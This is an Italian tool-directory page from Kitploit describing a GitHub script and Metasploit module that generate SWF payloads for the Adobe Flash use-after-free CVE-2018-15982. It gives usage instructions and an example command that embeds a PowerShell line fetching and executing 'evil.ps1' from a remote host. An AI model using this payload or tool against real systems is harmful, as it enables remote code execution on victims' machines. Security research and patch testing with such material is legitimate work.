Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
adobe-flash-cve2018-15982 — Script e modulo metasploit per CVE-2018-15982 | Kitploit
Strumenti/GitHubGitHub/kphongagsorn/adobe-flash-cve2018-15982
Framework di ExploitGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni Web
GitHubkphongagsorn/adobe-flash-cve2018-15982

adobe-flash-cve2018-15982

Script e modulo metasploit per CVE-2018-15982

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
1156 anni faNon ancora revisionato

Adobe Flash CVE-2018-15982

Questo script crea un payload swf per CVE-2018-15982, basato sul PoC di https://github.com/smgorelik/Windows-RCE-exploits. La vulnerabilità è stata scoperta da Chenming Xu e Ed Miles di Gigamon ATR.

La vulnerabilità è un difetto use-after-free che consente l'esecuzione arbitraria di codice in Flash. Ulteriori informazioni sono disponibili nei link seguenti.

  • https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982

Nota: attualmente viene spruzzato un solo blocco, me ne sono accorto dopo aver creato lo script.

Utilizzo:

python create_swf.py <comando> <nome file di output>

Esempio di utilizzo:

python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf

Testato su:

  • Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
  • Adobe Flash 31.0.0.153, 29.0.0.140

Esempio

Creazione del payload:

alt text

Esecuzione del payload:

alt text

Conferma dell'esecuzione:

alt text

Modulo Metasploit

alt text

Scarica lo strumento